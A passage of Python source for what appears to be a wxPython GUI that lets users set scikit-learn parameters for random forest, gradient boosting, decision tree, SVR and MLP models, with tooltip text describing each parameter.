self.to_int_or_none,\n \"shuffle\": self.to_bool,\n }\n\n self.button_calculate = wx.Button(self, wx.ID_ANY, \"Calculate\")\n self.button_features = wx.Button(self, wx.ID_ANY, \"Features\")\n self.button_importance = wx.Button(self, wx.ID_ANY, \"Importance Plot\")\n self.button_export_data = wx.Button(self, wx.ID_ANY, \"Export Data\")\n self.button_save_figure = wx.Button(self, wx.ID_ANY, \"Save Figure\")\n self.button_save_model = wx.Button(self, wx.ID_ANY, \"Save Model\")\n\n self.do_bind()\n\n def do_bind(self):\n self.Bind(\n wx.EVT_BUTTON, self.on_calculate, id=self.button_calculate.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_features, id=self.button_features.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_feature_importance,\n id=self.button_importance.GetId(),\n )\n self.Bind(\n wx.EVT_BUTTON, self.on_export, id=self.button_export_data.GetId()\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_save_figure,\n id=self.button_save_figure.GetId(),\n )\n self.Bind(\n wx.EVT_BUTTON,\n self.on_save_model,\n id=self.button_save_model.GetId(),\n )\n self.Bind(wx.EVT_SIZE, self.on_resize)\n\n def set_properties(self):\n self.SetTitle(self.title)\n x_size = [0.6, 0.8][self.include_test_data]\n self.SetMinSize(get_window_size(x_size, 0.7))\n self.set_defaults()\n\n for key, input_obj in self.input.items():\n input_obj.SetToolTip(self.tool_tips[key])\n\n for key, input_obj in self.data_split_input.items():\n input_obj.SetToolTip(DATA_SPLIT_TOOL_TIPS[key])\n\n def do_layout(self):\n sizer_wrapper = wx.BoxSizer(wx.HORIZONTAL)\n sizer_side_bar = wx.BoxSizer(wx.VERTICAL)\n sizer_actions = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Actions\"), wx.VERTICAL\n )\n sizer_param = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Parameters\"), wx.VERTICAL\n )\n sizer_split_param = wx.StaticBoxSizer(\n wx.StaticBox(self, wx.ID_ANY, \"Data Split\"), wx.VERTICAL\n )\n\n variables = list(self.input)\n variables.sort()\n sizer_input = {\n variable: wx.BoxSizer(wx.HORIZONTAL) for variable in variables\n }\n for variable in variables:\n sizer_input[variable].Add(\n wx.StaticText(self, wx.ID_ANY, \"%s:\\t\" % variable),\n 0,\n wx.EXPAND,\n 0,\n )\n sizer_input[variable].Add(self.input[variable], 1, wx.EXPAND, 0)\n sizer_param.Add(sizer_input[variable], 1, wx.EXPAND | wx.ALL, 2)\n sizer_side_bar.Add(sizer_param, 0, wx.ALL | wx.EXPAND, 5)\n\n split_variables = [\n \"test_size\",\n \"train_size\",\n \"random_state\",\n \"shuffle\",\n ]\n sizer_split_input = {\n variable: wx.BoxSizer(wx.HORIZONTAL)\n for variable in split_variables\n }\n for variable in split_variables:\n sizer_split_input[variable].Add(\n wx.StaticText(self, wx.ID_ANY, \"%s:\\t\" % variable),\n 0,\n wx.EXPAND,\n 0,\n )\n sizer_split_input[variable].Add(\n self.data_split_input[variable], 1, wx.EXPAND, 0\n )\n sizer_split_param.Add(\n sizer_split_input[variable], 1, wx.EXPAND | wx.ALL, 2\n )\n sizer_side_bar.Add(sizer_split_param, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_actions.Add(\n self.button_calculate,\n 1,\n wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP,\n 5,\n )\n sizer_actions.Add(\n self.button_features, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 5\n )\n sizer_actions.Add(\n self.button_importance,\n 1,\n wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP,\n 5,\n )\n sizer_actions.Add(\n self.button_export_data, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5\n )\n sizer_actions.Add(\n self.button_save_figure, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 5\n )\n sizer_actions.Add(\n self.button_save_model,\n 1,\n wx.BOTTOM | wx.EXPAND | wx.LEFT | wx.RIGHT,\n 5,\n )\n sizer_side_bar.Add(sizer_actions, 0, wx.ALL | wx.EXPAND, 5)\n\n sizer_wrapper.Add(sizer_side_bar, 0, wx.EXPAND, 0)\n\n sizer_wrapper.Add(self.plot.layout, 1, wx.EXPAND, 0)\n\n set_msw_background_color(\n self\n ) # If windows, change the background color\n set_frame_icon(self)\n\n self.SetSizer(sizer_wrapper)\n self.Layout()\n self.Fit()\n self.Center()\n\n def get_param(self, variable):\n ans = variable in list(self.input)\n input_dict = [self.data_split_input, self.input][ans]\n default_dict = [self.data_split_defaults, self.defaults][ans]\n getters_dict = [self.data_split_getters, self.getters][ans]\n\n try:\n return getters_dict[variable](input_dict[variable].GetValue())\n except Exception:\n return default_dict[variable]\n\n def set_defaults(self):\n for variable, input_obj in self.input.items():\n input_obj.SetValue(self.to_str_for_gui(self.defaults[variable]))\n for variable, input_obj in self.data_split_input.items():\n input_obj.SetValue(\n self.to_str_for_gui(self.data_split_defaults[variable])\n )\n\n @property\n def input_parameters(self):\n return {\n variable: self.get_param(variable)\n for variable in self.input.keys()\n if self.get_param(variable) != self.defaults[variable]\n }\n\n def set_input_parameters(self, input_parameters):\n for variable, value in input_parameters.items():\n self.input[variable].SetValue(str(value))\n\n @property\n def data_split_parameters(self):\n return {\n variable: self.get_param(variable)\n for variable in self.data_split_input.keys()\n if self.get_param(variable) != self.data_split_defaults[variable]\n }\n\n def set_data_split_parameters(self, data_split_input):\n for variable, value in data_split_input.keys():\n self.data_split_input[variable].SetValue(str(value))\n\n def to_int_float_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_int_or_float(str_value)\n\n @staticmethod\n def to_int_float_string_or_none(str_value):\n if str_value.lower() == \"none\":\n return None\n if str_value.isnumeric(): # int\n return int(float(str_value))\n if \".\" in str_value and len(str_value.split(\".\") == 2):\n return float(str_value)\n return str_value\n\n @staticmethod\n def to_int_or_float(str_value):\n if str_value.isnumeric(): # int\n return int(float(str_value))\n return float(str_value)\n\n def to_int_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_int(str_value)\n\n def to_float_or_none(self, str_value):\n if str_value.lower() == \"none\":\n return None\n return self.to_float(str_value)\n\n @staticmethod\n def to_int(str_value):\n return int(float(str_value))\n\n @staticmethod\n def to_float(str_value):\n return float(str_value)\n\n @staticmethod\n def to_str(str_value):\n return str_value\n\n @staticmethod\n def to_float_or_str(str_value):\n if \".\" in str_value and len(str_value.split(\".\") == 2):\n if (\n \"%s\" % (str_value.split(\".\")[0] + str_value.split(\".\")[1])\n ).isnumeric():\n return float(str_value)\n return str_value\n\n def to_float_str_or_none(self, str_value):\n try:\n return self.to_float_or_none(str_value)\n except Exception:\n return str_value\n\n @staticmethod\n def to_bool(str_value):\n if str_value.lower() == \"true\":\n return True\n return False\n\n @staticmethod\n def to_bool_or_str(str_value):\n if str_value.lower() == \"true\":\n return True\n if str_value.lower() == \"false\":\n return False\n return str_value\n\n @staticmethod\n def to_str_for_gui(value):\n if value is None:\n return \"None\"\n return str(value)\n\n @property\n def plot_data(self):\n try:\n self.model = self.sklearn_predictor(**self.input_parameters)\n return MachineLearningPlotData(\n self.data[\"X\"],\n self.data[\"y\"],\n self.model,\n **self.data_split_parameters\n )\n except Exception as e:\n wx.MessageBox(\n str(e), \"Error!\", wx.OK | wx.OK_DEFAULT | wx.ICON_WARNING\n )\n\n def do_prediction(self):\n self.model = self.sklearn_predictor(**self.input_parameters)\n return MachineLearningPlotData(\n self.data[\"X\"],\n self.data[\"y\"],\n self.model,\n **self.data_split_parameters\n )\n\n def on_calculate(self, evt):\n data = self.plot_data\n if data is not None:\n self.plot.update_data(data)\n\n def redraw_plot(self):\n self.plot.redraw_plot()\n\n def on_resize(self, *evt):\n try:\n self.Refresh()\n self.Layout()\n wx.CallAfter(self.redraw_plot)\n except RuntimeError:\n pass\n\n def on_export(self, evt):\n save_data_to_file(\n self, \"Save machine learning data to csv\", self.plot.get_csv()\n )\n\n def on_save_figure(self, *evt):\n title = \"Save %s Plot to .html\" % self.title.title()\n export_frame = self.main_app_frame.export_figure\n attr_dicts = None if export_frame is None else export_frame.attr_dicts\n self.plot.save_figure_dlg(self, title, attr_dicts=attr_dicts)\n\n def on_save_model(self, evt):\n data = {\n \"y_variable\": self.plot.y_variable,\n \"model\": self.model,\n \"sklearn_predictor\": self.sklearn_predictor,\n \"tool_tips\": self.tool_tips,\n \"x_variables\": self.plot.x_variables,\n \"title\": self.title,\n \"input_parameters\": self.input_parameters,\n \"data_split\": self.data_split_parameters,\n \"version\": DefaultOptions().VERSION,\n }\n save_data_to_file(\n self,\n \"Save Model\",\n data,\n wildcard=\"MODEL files (*.ml)|*.ml\",\n data_type=\"pickle\",\n initial_dir=MODELS_DIR,\n )\n\n def run(self):\n self.set_properties()\n self.do_layout()\n self.Show()\n self.on_calculate(None)\n\n @property\n def frame_size(self):\n return self.GetSize()\n\n @property\n def ml_type_short(self):\n return \"\".join([s[0] for s in self.title.split(\" \")]).upper()\n\n def on_features(self, *evt):\n ShowList(self.plot.x_variables, \"Features\")\n\n def on_feature_importance(self, evt):\n title = \"Importance Figure for %s (%s)\" % (\n self.title,\n self.data[\"y_variable\"],\n )\n plot_title = \"%s Feature Importances for %s\" % (\n self.title,\n self.data[\"y_variable\"],\n )\n self.feature_importance_dlg = FeatureImportanceFrame(\n self.data[\"options\"],\n self.data[\"x_variables\"],\n self.model.feature_importances_,\n title,\n plot_title,\n )\n self.feature_importance_dlg.Show()\n\n\nclass RandomForestFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n tool_tips = [RF_TOOL_TIPS_CLASSIFIER, RF_TOOL_TIPS][\n alg_type == \"regressor\"\n ]\n crit_choices = [[\"gini\", \"entropy\"], [\"mse\", \"mae\"]][\n alg_type == \"regressor\"\n ]\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Random Forest\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n tool_tips=tool_tips,\n )\n\n self.input = {\n \"n_estimators\": wx.TextCtrl(self, wx.ID_ANY, \"100\"),\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=crit_choices,\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"bootstrap\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"oob_score\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"n_jobs\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n }\n\n self.defaults = {\n \"n_estimators\": 100,\n \"criterion\": crit_choices[0],\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0.0,\n \"max_features\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0.0,\n \"bootstrap\": True,\n \"oob_score\": False,\n \"n_jobs\": None,\n \"random_state\": None,\n }\n\n self.getters = {\n \"n_estimators\": self.to_int,\n \"criterion\": self.to_str,\n \"max_depth\": self.to_int_or_none,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"bootstrap\": self.to_bool,\n \"oob_score\": self.to_bool,\n \"n_jobs\": self.to_int_or_none,\n \"random_state\": self.to_int_or_none,\n }\n\n self.run()\n\n\nclass GradientBoostingFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Gradient Boosting\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"loss\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"ls\", \"lad\", \"huber\", \"quantile\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"learning_rate\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"n_estimators\": wx.TextCtrl(self, wx.ID_ANY, \"100\"),\n \"subsample\": wx.TextCtrl(self, wx.ID_ANY, \"1.0\"),\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"friedman_mse\", \"mse\", \"mae\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"3\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"alpha\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"init\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"DummyEstimator\", \"zero\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"presort\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"auto\", \"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"validation_fraction\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"n_iter_no_change\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-4\"),\n }\n\n self.defaults = {\n \"loss\": \"ls\",\n \"learning_rate\": 0.1,\n \"n_estimators\": 100,\n \"subsample\": 1.0,\n \"criterion\": \"friedman_mse\",\n \"max_depth\": 3,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0,\n \"max_features\": None,\n \"alpha\": 0.9,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0,\n \"init\": \"DummyEstimator\",\n \"random_state\": None,\n \"presort\": \"auto\",\n \"validation_fraction\": 0.1,\n \"n_iter_no_change\": None,\n \"tol\": float(\"1e-4\"),\n }\n\n self.getters = {\n \"loss\": self.to_str,\n \"learning_rate\": self.to_float,\n \"n_estimators\": self.to_int,\n \"subsample\": self.to_float,\n \"criterion\": self.to_str,\n \"max_depth\": self.to_int,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"alpha\": self.to_float,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"init\": self.to_str,\n \"random_state\": self.to_int_or_none,\n \"presort\": self.to_bool_or_str,\n \"validation_fraction\": self.to_float,\n \"n_iter_no_change\": self.to_int_or_none,\n \"tol\": self.to_float,\n }\n\n self.run()\n\n\nclass DecisionTreeFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Decision Tree\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"criterion\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"mse\", \"friedman_mse\", \"mae\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"splitter\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"best\", \"random\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"max_depth\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_samples_split\": wx.TextCtrl(self, wx.ID_ANY, \"2\"),\n \"min_samples_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"1\"),\n \"min_weight_fraction_leaf\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"max_features\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_leaf_nodes\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"min_impurity_decrease\": wx.TextCtrl(self, wx.ID_ANY, \"0\"),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"presort\": wx.ComboBox(\n self,\n wx.ID_ANY,\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n }\n\n self.defaults = {\n \"criterion\": \"mse\",\n \"splitter\": \"best\",\n \"max_depth\": None,\n \"min_samples_split\": 2,\n \"min_samples_leaf\": 1,\n \"min_weight_fraction_leaf\": 0.0,\n \"max_features\": None,\n \"max_leaf_nodes\": None,\n \"min_impurity_decrease\": 0.0,\n \"random_state\": None,\n \"presort\": False,\n }\n\n self.getters = {\n \"criterion\": self.to_str,\n \"splitter\": self.to_str,\n \"max_depth\": self.to_int_or_none,\n \"min_samples_split\": self.to_int_or_float,\n \"min_samples_leaf\": self.to_int_or_float,\n \"min_weight_fraction_leaf\": self.to_float,\n \"max_features\": self.to_int_float_string_or_none,\n \"max_leaf_nodes\": self.to_int_or_none,\n \"min_impurity_decrease\": self.to_float,\n \"random_state\": self.to_int_or_none,\n \"presort\": self.to_bool,\n }\n\n self.run()\n\n\nclass SupportVectorRegressionFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Support Vector Machine\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"kernel\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"rbf\",\n choices=[\"linear\", \"poly\", \"rbf\", \"sigmoid\", \"precomputed\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"degree\": wx.TextCtrl(self, wx.ID_ANY, \"3\"),\n \"gamma\": wx.TextCtrl(self, wx.ID_ANY, \"auto\"),\n \"coef0\": wx.TextCtrl(self, wx.ID_ANY, \"0.0\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-3\"),\n \"C\": wx.TextCtrl(self, wx.ID_ANY, \"1.0\"),\n \"epsilon\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"shrinking\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"cache_size\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"max_iter\": wx.TextCtrl(self, wx.ID_ANY, \"-1\"),\n }\n\n self.defaults = {\n \"kernel\": \"rbf\",\n \"degree\": 3,\n \"gamma\": \"scale\",\n \"coef0\": 0.0,\n \"tol\": 0.001,\n \"C\": 1.0,\n \"epsilon\": 0.1,\n \"shrinking\": True,\n \"cache_size\": None,\n \"max_iter\": -1,\n }\n\n self.getters = {\n \"kernel\": self.to_str,\n \"degree\": self.to_int,\n \"gamma\": self.to_float_or_str,\n \"coef0\": self.to_float,\n \"tol\": self.to_float,\n \"C\": self.to_float,\n \"epsilon\": self.to_float,\n \"shrinking\": self.to_bool,\n \"cache_size\": self.to_float_or_none,\n \"max_iter\": self.to_int,\n }\n\n self.button_importance.Disable()\n\n self.run()\n\n\nclass MLPFrame(MachineLearningFrame):\n def __init__(\n self,\n main_app_frame,\n data,\n include_test_data=True,\n alg_type=\"regressor\",\n ):\n MachineLearningFrame.__init__(\n self,\n main_app_frame,\n data,\n \"Multilayer Perceptron\",\n include_test_data=include_test_data,\n alg_type=alg_type,\n )\n\n self.input = {\n \"activation\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"relu\",\n choices=[\"identity\", \"logistic\", \"tanh\", \"relu\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"solver\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"adam\",\n choices=[\"lbfgs\", \"sgd\", \"adam\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"alpha\": wx.TextCtrl(self, wx.ID_ANY, \"0.001\"),\n \"batch_size\": wx.TextCtrl(self, wx.ID_ANY, \"auto\"),\n \"learning_rate\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"constant\",\n choices=[\"constant\", \"invscaling\", \"adaptive\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"learning_rate_init\": wx.TextCtrl(self, wx.ID_ANY, \"0.001\"),\n \"power_t\": wx.TextCtrl(self, wx.ID_ANY, \"0.5\"),\n \"max_iter\": wx.TextCtrl(self, wx.ID_ANY, \"200\"),\n \"shuffle\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"random_state\": wx.TextCtrl(self, wx.ID_ANY, \"None\"),\n \"tol\": wx.TextCtrl(self, wx.ID_ANY, \"1e-4\"),\n \"warm_start\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"False\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"momentum\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"nesterovs_momentum\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"True\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"early_stopping\": wx.ComboBox(\n self,\n wx.ID_ANY,\n \"False\",\n choices=[\"True\", \"False\"],\n style=wx.CB_DROPDOWN | wx.CB_READONLY,\n ),\n \"validation_fraction\": wx.TextCtrl(self, wx.ID_ANY, \"0.1\"),\n \"beta_1\": wx.TextCtrl(self, wx.ID_ANY, \"0.9\"),\n \"beta_2\": wx.TextCtrl(self, wx.ID_ANY, \"0.999\"),\n \"epsilon\": wx.TextCtrl(self, wx.ID_ANY, \"1e-8\"),\n \"n_iter_no_change\": wx.TextCtrl(self, wx.ID_ANY, \"10\"),\n }\n\n self.defaults = {\n \"activation\": \"relu\",\n \"solver\": \"adam\",\n \"alpha\": 0.0001,\n \"batch_size\": \"auto\",\n \"learning_rate\": \"constant\",\n \"learning_rate_init\": 0.001,\n \"power_t\": 0.5,\n \"max_iter\": 200,\n \"shuffle\": True,\n \"random_state\": None,\n \"tol\": 1e-4,\n \"warm_start\": False,\n \"momentum\": 0.9,\n \"nesterovs_momentum\": True,\n \"early_stopping\": False,\n \"validation_fraction\": 0.1,\n \"beta_1\": 0.9,\n \"beta_2\": 0.999,\n \"epsilon\": 1e-08,\n \"n_iter_no_change\": 10,\n }\n\n self.getters = {\n \"activation\": self.to_str,\n \"solver\": self.to_str,\n \"alpha\": self.to_float,\n \"batch_size\": self.to_float_or_str,\n \"learning_rate\": self.to_str,\n \"learning_rate_init\": self.to_float,\n \"power_t\": self.to_float,\n \"max_iter\": self.to_int,\n \"shuffle\": self.to_bool,\n \"random_state\": self.to_int_or_none,\n \"tol\": self.to_float,\n \"warm_start\": self.to_bool,\n \"momentum\": self.to_float,\n \"nesterovs_momentum\": self.to_bool,\n \"early_stopping\": self.to_bool,\n \"validation_fraction\": self.to_float,\n \"beta_1\": self.to_float,\n \"beta_2\": self.to_float,\n \"epsilon\": self.to_float,\n \"n_iter_no_change\": self.to_int,\n }\n\n self.button_importance.Disable()\n\n self.run()\n\n\nRF_TOOL_TIPS = {\n \"n_estimators\": \"int\\nThe number of trees in the forest.\",\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are \"\n \"“mse” for the mean squared error, which is equal to variance reduction as\"\n \" feature selection criterion, and “mae” for the mean absolute error.\",\n \"max_depth\": \"int, None\\nThe maximum depth of the tree. If None, then nodes are expanded until all \"\n \"leaves are pure or until all leaves contain less than min_samples_split samples.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as the \"\n \"minimum number.\\n• If float, then min_samples_split is a fraction \"\n \"and ceil(min_samples_split * n_samples) are the minimum number \"\n \"of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a leaf\"\n \" node. A split point at any depth will only be considered if it \"\n \"leaves at least min_samples_leaf training samples in each of the \"\n \"left and right branches. This may have the effect of smoothing \"\n \"the model, especially in regression.\\n• If int, then consider min_\"\n \"samples_leaf as the minimum number.\\n• If float, then min_samples_\"\n \"leaf is a fraction and ceil(min_samples_leaf * n_samples) are the \"\n \"minimum number of samples for each node.\",\n \"min_weight_fraction_leaf\": \"float\\nThe minimum weighted fraction of the sum total of \"\n \"weights (of all the input samples) required to be at a leaf\"\n \" node. Samples have equal weight when sample_weight is not\"\n \" provided.\",\n \"max_features\": \"int, float, string, or None\\nThe number of features to consider when \"\n \"looking for the best split:\\n• If int, then consider max_features \"\n \"features at each split.\\n• If float, then max_features is a fraction\"\n \" and int(max_features * n_features) features are considered at each \"\n \"split.\\n• If “auto”, then max_features=n_features.\\n• If “sqrt”, \"\n \"then max_features=sqrt(n_features).\\n• If “log2”, then max_\"\n \"features=log2(n_features).\\n• If None, then max_features=n_features.\",\n \"max_leaf_nodes\": \"int or None\\nGrow a tree with max_leaf_nodes in best-first fashion. \"\n \"Best nodes are defined as relative reduction in impurity. If None \"\n \"then unlimited number of leaf nodes.\",\n \"min_impurity_decrease\": \"float\\nA node will be split if this split induces a decrease \"\n \"of the impurity greater than or equal to this value.\\nThe \"\n \"weighted impurity decrease equation is the following:\\n\"\n \"N_t / N * (impurity - N_t_R / N_t * right_impurity\\n\"\n \" - N_t_L / N_t * left_impurity)\\n\"\n \"where N is the total number of samples, N_t is the number of \"\n \"samples at the current node, N_t_L is the number of samples \"\n \"in the left child, and N_t_R is the number of samples in the \"\n \"right child.\\nN, N_t, N_t_R and N_t_L all refer to the \"\n \"weighted sum, if sample_weight is passed.\",\n \"bootstrap\": \"Whether bootstrap samples are used when building trees. If False, the \"\n \"whole datset is used to build each tree.\",\n \"oob_score\": \"whether to use out-of-bag samples to estimate the R^2 on unseen data.\",\n \"n_jobs\": \"int or None\\nThe number of jobs to run in parallel for both fit and \"\n \"predict. None` means 1 unless in a joblib.parallel_backend context. -1 \"\n \"means using all processors.\",\n \"random_state\": \"int or None\\nIf int, random_state is the seed used by the random \"\n \"number generator; If None, the random number generator is the \"\n \"RandomState instance used by np.random.\",\n}\n\nRF_TOOL_TIPS_CLASSIFIER = {key: value for key, value in RF_TOOL_TIPS.items()}\nRF_TOOL_TIPS_CLASSIFIER[\"criterion\"] = (\n \"The function to measure the quality of a split. Supported criteria \"\n \"are “gini” for the Gini impurity and “entropy” for the information gain. \\n\"\n \"Note: this parameter is tree-specific.\"\n)\n\nGB_TOOL_TIPS = {\n \"loss\": \"loss function to be optimized. ‘ls’ refers to least squares regression. \"\n \"‘lad’ (least absolute deviation) is a highly robust loss function solely \"\n \"based on order information of the input variables. ‘huber’ is a combination \"\n \"of the two. ‘quantile’ allows quantile regression (use alpha to specify the \"\n \"quantile).\",\n \"learning_rate\": \"float\\nlearning rate shrinks the contribution of each tree by \"\n \"learning_rate. There is a trade-off between learning_rate and n_estimators.\",\n \"n_estimators\": \"int\\nThe number of boosting stages to perform. Gradient boosting is \"\n \"fairly robust to over-fitting so a large number usually results in \"\n \"better performance.\",\n \"subsample\": \"float\\nThe fraction of samples to be used for fitting the individual \"\n \"base learners. If smaller than 1.0 this results in Stochastic Gradient \"\n \"Boosting. subsample interacts with the parameter n_estimators. Choosing \"\n \"subsample < 1.0 leads to a reduction of variance and an increase in bias.\",\n \"criterion\": \"The function to measure the quality of a split. Supported criteria are\"\n \" “friedman_mse” for the mean squared error with improvement score by \"\n \"Friedman, “mse” for mean squared error, and “mae” for the mean absolute\"\n \" error. The default value of “friedman_mse” is generally the best as it \"\n \"can provide a better approximation in some cases.\",\n \"max_depth\": \"int\\nmaximum depth of the individual regression estimators. The maximum \"\n \"depth limits the number of nodes in the tree. Tune this parameter for \"\n \"best performance; the best value depends on the interaction of the input\"\n \" variables.\",\n \"min_samples_split\": \"int, float\\nThe minimum number of samples required to split an \"\n \"internal node:\\n• If int, then consider min_samples_split as \"\n \"the minimum number.\\n• If float, then min_samples_split is a \"\n \"fraction and ceil(min_samples_split * n_samples) are the minimum\"\n \" number of samples for each split.\",\n \"min_samples_leaf\": \"int, float\\nThe minimum number of samples required to be at a \"\n \"leaf node. A split point at any depth will only be considered if \"\n \"it leaves at least min_samples_leaf training samples in each of \"\n \"the left and right branches. This may have the effect of \"\n \"smoothing the model, especially in regression.\\n• If int, then \"\n \"consider min_samples_leaf as the minimum 